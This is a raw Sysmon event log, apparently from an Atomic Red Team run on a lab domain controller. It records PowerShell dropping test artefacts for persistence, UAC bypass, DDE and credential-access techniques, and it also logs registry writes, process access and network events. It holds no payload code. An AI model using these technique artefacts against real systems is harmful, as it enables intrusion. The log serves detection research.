21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d76873-0xf61439ce) 13241300x800000000000000024461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:49.556{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7687c-0x57d8a1ce) 11241100x800000000000000024460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.431{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.011\src\index.hta2021-06-23 21:08:49.431 11241100x800000000000000024459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.399{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.011\src\akteullen.vbs2021-06-23 21:08:49.399 23542300x800000000000000024458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:49.321{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDAC03DFB9BBF15525CE4124EDB48010,SHA256=2DD60AB5724F530087DA5E509F81152147AA4E0E335D0D766DC56A65CA425B46,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.228{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.010\bin\AllTheThingsx86.dll2021-06-23 21:08:49.228 11241100x800000000000000024456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.212{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.010\bin\AllTheThingsx64.dll2021-06-23 21:08:49.212 11241100x800000000000000024455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:49.071{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1218.008\src\Win32\T1218-2.dll2021-06-23 21:08:49.071 23542300x800000000000000024477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:50.935{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7CC575EA1BBE4C31E88F56FDD0E3D8CE,SHA256=7539B05E34246B3918B6FA2B43E3C6C37F3EC785B84BCEEE6CC7256179B653C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:50.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0C189745428ECEE74D801FCDA01178A,SHA256=9C1F702B54149B0B85A62B62054CAE22A93F5D87FB125E330E2A9F09105851F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:51.935{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=186D338B1F85A1AD89AC24931E27D840,SHA256=D96AFEF09F645C16EF5DD807C05A6B1748C17EE4A9D4C85A459EA6DD1F31285C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:51.888{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.011\bin\AtomicTest.exe2021-06-23 21:08:51.888 11241100x800000000000000024482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:51.873{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.011\bin\AtomicTest.dll2021-06-23 21:08:51.873 11241100x800000000000000024481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:51.716{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.010\bin\T1546.010x86.dll2021-06-23 21:08:51.716 11241100x800000000000000024480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:51.701{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1546.010\bin\T1546.010.dll2021-06-23 21:08:51.701 23542300x800000000000000024479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:51.357{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E334D771F90373D79F941A5A984500E7,SHA256=F0C0521C937D141EC6794ECAF5B5A028E09D9CC75F69F6D4BF4D25C9F548D746,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:51.076{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1543.003\bin\AtomicService.exe2021-06-23 21:08:51.076 10341000x800000000000000024505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.951{4DB9351A-9DDD-60D3-1400-00000000CF01}10562052C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.939{4DB9351A-A2E4-60D3-1E06-00000000CF01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.935{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3ED7F2D34944CFB4CB11B7D0F421BA51,SHA256=78EA8B58ED7D9BA999C7A2A25D46B6EE92828DAF41604D69E5F11DD800556079,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.763{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1548.002\src\T1548.002.bat2021-06-23 21:08:52.763 23542300x800000000000000024494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.373{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4EE7DC1CD4494B25BA87BA15E2FFA47,SHA256=98462909BD307EBF3FDFE450FA3317DAE815EFEA22FE55CDBFE6D4AC03FEF39C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000024493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000024492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000024491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000024490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d76873-0xf805078a) 13241300x800000000000000024489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000024488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:08:52.232{4DB9351A-9DDD-60D3-1300-00000000CF01}760C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 11241100x800000000000000024487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.232{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1547.001\src\vbsstartup.vbs2021-06-23 21:08:52.232 11241100x800000000000000024486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.216{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1547.001\src\jsestartup.jse2021-06-23 21:08:52.216 11241100x800000000000000024485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.201{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1547.001\src\batstartup.bat2021-06-23 21:08:52.201 11241100x800000000000000024522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.982{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1559.002\src\PowerShell_Script_For_DDE_Document.ps12021-06-23 21:08:53.982 10341000x800000000000000024521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.810{4DB9351A-A2E5-60D3-1F06-00000000CF01}71602932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000024520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.615{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61509-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000024519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.615{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61509-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000024518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:52.271{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61508-false10.0.1.12-8000- 11241100x800000000000000024517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.576{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1555\src\T1555-macrocode.txt2021-06-23 21:08:53.576 23542300x800000000000000024516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.576{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADF16F95C2B029BACD32657D15B8049,SHA256=D982164B7C7DA916BD0580DE67D758B3F511B670044B578EDE50EF52E98F13D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.576{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=655FA373C3B9A443BC2DA98D44775874,SHA256=8F159AF1E49936BA6341692CABE08B36C365435499D56574739A3A3CAD60C297,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E5-60D3-1F06-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:53.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 